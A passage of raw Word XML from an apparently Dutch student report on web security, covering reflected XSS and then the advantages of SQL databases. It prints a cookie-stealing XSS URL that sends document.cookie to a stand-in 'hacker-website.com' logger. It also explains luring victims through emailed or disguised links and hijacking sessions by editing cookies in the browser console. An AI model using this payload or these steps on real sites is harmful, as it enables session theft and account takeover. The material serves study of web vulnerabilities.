                            <w:r w:rsidRPr="003F2F0E">
                              <w:rPr>
                                <w:sz w:val="22"/>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="520B4E29" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="16C25A5B" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00367610">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Output:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39111845" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00771C98" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00771C98">
                              <w:rPr>
                                <w:lang w:val="en-GB"/>
                              </w:rPr>
                              <w:t>Hi Tom!</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FDCE648" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE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EC8" id="_x0000_s1263" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:.85pt;width:270.65pt;height:83.3pt;z-index:2532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" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="79EBBFBA" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6427483E" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003F2F0E">
                        <w:rPr>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>www.voorbeeld-xss.nl?username=Tom</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="520B4E29" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="16C25A5B" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00367610">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Output:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39111845" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00771C98" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00771C98">
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                        <w:t>Hi Tom!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FDCE648" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00367610" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB83DC" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="762E6AEE" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="6DC92EC2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="5A13C3E2" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253266944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CE78A83" wp14:editId="43CB317B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-74295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>450850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5593715" cy="907415"/>
                <wp:effectExtent l="0" t="0" r="19685" b="32385"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8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07415"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="50000"/>
                              <a:lumOff val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="387B427B" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6BB238DB" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                            <w:r w:rsidRPr="00160FF3">
                              <w:t>http://www.voorbeeld-xss.nl?username=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&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8A83" id="_x0000_s1264" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:35.5pt;width:440.45pt;height:71.45pt;z-index:2532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" fillcolor="#e7e6e6 [3214]" strokecolor="gray [1629]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="387B427B" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>URL</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6BB238DB" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00160FF3">
                        <w:t>http://www.voorbeeld-xss.nl?username</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00160FF3">
                        <w:t>=&lt;script&gt;location.href=‘http://www.hacker-website.com/logcookie.php?cookie=’+document.cookie;&lt;/script&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>In dit scenario weet de hacker dat de website kwetsbaar is tegen XSS aanvallen. De hacker bouwt een URL op die hij door de slachtoffer laat uitvoeren. De URL bestaat uit vier delen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434E953C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BFFA5C" w14:textId="3A2193E4" w:rsidR="00CF3AE8" w:rsidRPr="00A02127" w:rsidRDefault="00272FA3" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253278208" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A07CC61" wp14:editId="2E0D7D08">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-901952</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="851" name="Rectangle 8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04F" id="Rectangle 851" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.55pt;margin-top:-70.95pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CF3AE8" w:rsidRPr="00A02127">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Structuur van URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F473EA" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. URL plus de query username van de website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F9F57" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.  HTML script element met de javascript Windows.location.href</w:t>
      </w:r>
      <w:r w:rsidRPr="00997215">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> functie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60A372" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. de URL van de hackers website met als query cookie en als waarde het cookie van het slachtoffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B3A41" w14:textId="58EA934B" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A6DAC1" w14:textId="3B2398AE" w:rsidR="00CF3AE8" w:rsidRPr="006B346C" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502303CA" w14:textId="067E987C" w:rsidR="00CF3AE8" w:rsidRPr="00D327A4" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D327A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voorwaarden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5548E0" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t>Voor de werking van deze XSS-aanval is het nodig dat de gebruiker is ingelogd, want anders is er geen sessie id gegenereerd en dus ook geen kwetsbaarheid om te exploiteren. Dit betekend dat de website enkel kwetsbaar wordt als er gebruikers ingelogd zijn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9BA2D" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">De exploitatie kan op elke website gebeuren waar gebruikerscontent gepubliceerd kan worden. Een ander manier is om de selectie van slachtoffers een email te sturen met de link, het liefst verbogen in een klikbare afbeelding zoals een advertentie of een uitnodigende hyperlink. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC83368" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253267968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E02175A" wp14:editId="1146B7FB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>23072</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>75142</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2379133" cy="762000"/>
                <wp:effectExtent l="19050" t="0" r="40640" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="837"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C1109" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">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175A"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265" type="#_x0000_t54" style="position:absolute;left:0;text-align:left;margin-left:1.8pt;margin-top:5.9pt;width:187.35pt;height:6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" adj=",18000" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2F3C1109" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">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3268992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="610CDB51" wp14:editId="4546A90A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2757594</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3817620" cy="512445"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="8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7A1ADEF" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="006B40B9" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">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DB51" id="_x0000_s1266" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:217.15pt;margin-top:22.55pt;width:300.6pt;height:40.35pt;z-index:-2500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ByhDRyJgIAACYEAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9j&#10;LnhtbFBLAQItABQABgAIAAAAIQC/HkJI3wAAAAsBAAAPAAAAAAAAAAAAAAAAAH4EAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABADzAAAAigUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="27A1ADEF" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="006B40B9" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">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E68D535" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253270016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42CFACB7" wp14:editId="3421B848">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2351405</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>91440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="389467" cy="262467"/>
                <wp:effectExtent l="0" t="19050" r="29845" b="42545"/>
                <wp:wrapNone/>
                <wp:docPr id="839"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790D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" adj="14322" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7FD1C" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00D22C48" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8"/>
    <w:p w14:paraId="2146177B" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E01CD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>FIGUUR 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF8A46" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Zodra de niets vermoedende gebruiker erop klikt wordt de sessie ID weggeschreven naar een tekstbestand op het systeem van de hacker. De verzamelde sessie ID’s kan de hacker vervolgens gebruiken om toegang te krijgen tot de accounts van de slachtoffers. De hacker doet dit door zijn eigen sessie ID te veranderen in die van zijn slachtoffer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6868F0" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00D47336" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47336">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cookies veranderen in Chrome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E79EF" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253271040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CA766CB" wp14:editId="0D1F3BE9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>199390</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3919855" cy="736600"/>
            <wp:effectExtent l="25400" t="0" r="42545" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="847" name="Diagram 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r>
        <w:t>Met de Console van Chrome kun je in Javascript de cookies veranderen van waarden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E888E3" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r w:rsidRPr="00F12D3B">
        <w:t>Javascript commando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD835BE" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="253272064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="024A1C09" wp14:editId="70223632">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4275455" cy="405765"/>
                <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="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F168C55" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">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1C09" id="_x0000_s1267" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:.65pt;width:336.65pt;height:31.95pt;z-index:2532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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="3F168C55" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00CF3AE8">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1A92AC97" w14:textId="77777777" w:rsidR="00CF3AE8" w:rsidRPr="00F12D3B" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E1993F" w14:textId="7FE04C7A" w:rsidR="00DE405E" w:rsidRDefault="00CF3AE8" w:rsidP="00CF3AE8">
      <w:r>
        <w:t xml:space="preserve">Bij het uitvoeren van deze commando kan de hacker zich nu </w:t>
      </w:r>
      <w:r w:rsidRPr="008E50BA">
        <w:t>proble</w:t>
      </w:r>
      <w:r>
        <w:t>emloos voordoen als andere gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE2E69F" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="72" w:name="_Toc496292479"/>
    <w:p w14:paraId="1E59BFEE" w14:textId="1B94CDE5" w:rsidR="00E31BB5" w:rsidRDefault="00E31BB5" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F9607E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253282304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="096E84E4" wp14:editId="366EBBD0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-894315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="854" name="Rectangle 8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5C8" id="Rectangle 854" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.4pt;margin-top:-70.75pt;width:25pt;height:1031.7pt;z-index:-2500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U2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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DF72C7" w:rsidRPr="00F9607E">
        <w:t>SQL onderzoek</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="433637B9" w14:textId="37F9148E" w:rsidR="00DE405E" w:rsidRPr="00A71F83" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r w:rsidRPr="001A1584">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Voordelen van een SQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12049E3C" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>SQL is een ANSI</w:t>
      </w:r>
      <w:r w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>/ISO</w:t>
      </w:r>
      <w:r w:rsidRPr="004940EC">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standaardtaal voor relationele DBM systemen. Omdat het gestandaardiseerd is kan het bijna met elke software systeem geïntegreerd worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56371819" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Een sterke punt van SQL databases is het gebruik van SQL als operatieve taal. Met deze taal kun je query’s uitvoeren waarmee data opgehaald kan worden, gewijzigd, geüpdatet en verwijderd. Het is een declaratieve taal wat het schrijven van query’s makkelijk maakt. Bij declaratieve talen schrijft je wat er moet gebeuren i.p.v. hoe het moet gebeuren. Dit maakt het een krachtige taal met een lage leercurve. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA448AE" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t>Een ander sterk punt van SQL databases is dat zij gebruik maken van gestructureerde schema waarmee op een georganiseerde manier data kan worden opgeslagen. Bij het maken van een schema wordt er eerst wat voorbereidend werkt gedaan, zoals het identificeren van entiteiten en het normaliseren daarvan, dit wordt gedaan om redundantie binnen het database structuur te verminderen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B850DA2" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:r>
        <w:t xml:space="preserve">Een schema bestaat zoals in figuur 3.5.2 uit tabellen, deze zijn met elkaar verbonden door relaties wat een ander voordeel is. Database engineers kunnen relaties tussen tabellen definiëren om zo afhankelijkheid tussen de tabellen te creëren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68D233" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRPr="001311F0" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001311F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Relaties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1254B9E9" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Één op één relatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576CC8C7" w14:textId="77777777" w:rsidR="00DE405E" w:rsidRDefault="00DE405E" w:rsidP="00DE405E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
